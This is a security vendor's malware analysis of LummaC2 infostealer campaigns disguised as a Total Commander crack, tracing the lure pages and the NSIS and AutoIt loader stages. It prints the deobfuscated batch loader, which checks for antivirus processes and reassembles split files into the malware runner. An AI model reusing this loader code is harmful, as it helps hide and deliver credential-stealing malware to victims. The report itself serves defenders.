LummaC2 Malware Distributed Disguised as Total Commander Crack
AhnLab SEcurity intelligence Center (ASEC) has discovered the LummaC2 malware being distributed disguised as the Total Commander tool. Total Commander is a file manager for Windows that supports various file formats. It offers convenient file management features such as copy and move features, advanced search using strings within files, folder synchronization, and FTP/SFTP features. The tool offers one-month free trial, after which users are required to purchase a full version (license).
Figure 1. Total Commander
Searching “Total Commander Crack” on Google displays a post about downloading the crack version. Clicking on the post connects to Google Colab drive and prompts the user to click the download button. Following the flow shown in Figure 2 to Figure 5, the user is led through multiple page transitions before finally arriving at the location where the threat actor has uploaded the file. These page transitions do not occur through automatic redirection, but rather require the user to read the posts and click on the links to download the malware disguised as a crack. This means that the attack specifically targeted users who intended to download the crack software. The attack’s meticulous nature can be seen in the fact that the post and comments on the Reddit community about the request for Total Commander crack version and the response included hyperlinks.
Figure 2. Search result of “Total Commander Crack” on Google
Figure 3. Download page 1 – Google Colab drive
Figure 4. Page 2 of the Download Page – Disguised as a Reddit Post
Figure 5. Download page 3 – Final download page
The ZIP file downloaded through the link has a double-compressed structure with an RAR file inside, and it is password-protected.
Figure 6. Compressed file being downloaded and its contents
The user is prompted to install the “installer_1.05_38.2.exe” file, which infects the system with LummaC2 when executed. This malware is a heavily obfuscated version of LummaC2 that has been compressed multiple times using NSIS and AutoIt scripts. When executed, the NSIS script is the first to run. This script uses the ExecShell command to execute a batch script via cmd. The highlighted part in Figure 7 shows how a variable is inserted into the middle of a string. When the value of the variable is inserted at runtime, the following command is executed.
ExecShell open cmd “/c copy Nv Nv.cmd & Nv.cmd
Figure 7. NSIS script
The Batch script is obfuscated as shown below. It involves storing characters in variables and inserting these variables in the middle of commands. Additionally, meaningless strings are added in the middle of the commands to make the script harder to understand.
Figure 8. Nv.cmd (Batch script)
The deobfuscated script is shown below, and it can be seen that the script is relatively short.
Set VOqMytMZEmITmzXaSwyTLVZwsCxvDeT=Olympic.com
Set RRddJNCtGgRY=
Set FThiSRhhaXuEMFetxlGlyEUpdIbYBdqZFoz=5
tasklist | findstr /I "opssvc wrsa" & if not errorlevel 1 ping -n 194 127.0.0.1
Set /a Fires=363926
tasklist | findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" & if not errorlevel 1 Set VOqMytMZEmITmzXaSwyTLVZwsCxvDeT=AutoIt3.exe & Set RRddJNCtGgRY=.a3x & Set FThiSRhhaXuEMFetxlGlyEUpdIbYBdqZFoz=300
cmd /c md Fires
extrac32 /Y /E Schools
<nul set /p ="MZ" > Fires\VOqMytMZEmITmzXaSwyTLVZwsCxvDeT
findstr /V "LIL" Cir >> Fires\VOqMytMZEmITmzXaSwyTLVZwsCxvDeT
cmd /c copy /b Fires\VOqMytMZEmITmzXaSwyTLVZwsCxvDeT + Religion + Consisting + Stuart + Police + Turns + Constitutes + Knives + Momentum + Stuff + Keywords + Infections Fires\VOqMytMZEmITmzXaSwyTLVZwsCxvDeT
cd Fires
cmd /c copy /b ..\Hebrew + ..\Fla + ..\Mtv + ..\Novel + ..\Suffer + ..\Update + ..\Msn NRRddJNCtGgRY
start VOqMytMZEmITmzXaSwyTLVZwsCxvDeT NRRddJNCtGgRY
cd ..
choice /d y /t FThiSRhhaXuEMFetxlGlyEUpdIbYBdqZFoz
The analysis result shows that a normal AutoIt executable (Runner) and a compiled AutoIt (.a3x) script are executed. The cmd file executed by NSIS upon initial execution is a single file, and the .a3x script and the AutoIt executable that acts as a runner to execute the script are divided into multiple files. Refer to Figure 9 below to see how the files are divided.
Figure 9. Divided binary file
The LummaC2 malware that is ultimately executed is encrypted within the .a3x file, as shown in Figure 10. It is decrypted at the time of execution and loaded into the memory. Both the encrypted malware binary and the shellcode that decompresses and loads it are included within the AutoIt script. This method of wrapping malware in an AutoIt script is commonly used by threat actors. For more information on this technique, please refer to the following posts: [1][2]
Figure 10. Script decompiled from the .a3x file
LummaC2 is an information-stealing malware that has been actively distributed since early 2023. It is mainly disguised as illegal programs such as cracks and serials. When a system is infected with LummaC2, sensitive information such as browser-stored account credentials, email credentials, cryptocurrency wallet credentials, and auto-login program credentials are sent to the threat actor’s C&C server. The stolen information may be traded in the dark web or used in secondary attacks, causing additional harm. There have been continuous reports of data breaches where the theft of information from a personal PC led to an attack on the corporate system. For more information on LummaC2, please refer to the following posts: [3], [4], [5], [6], and [7].
It is recommended to download software only from official distribution sites. Extra caution is advised when using software from unknown sources.
Gain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click the banner below.
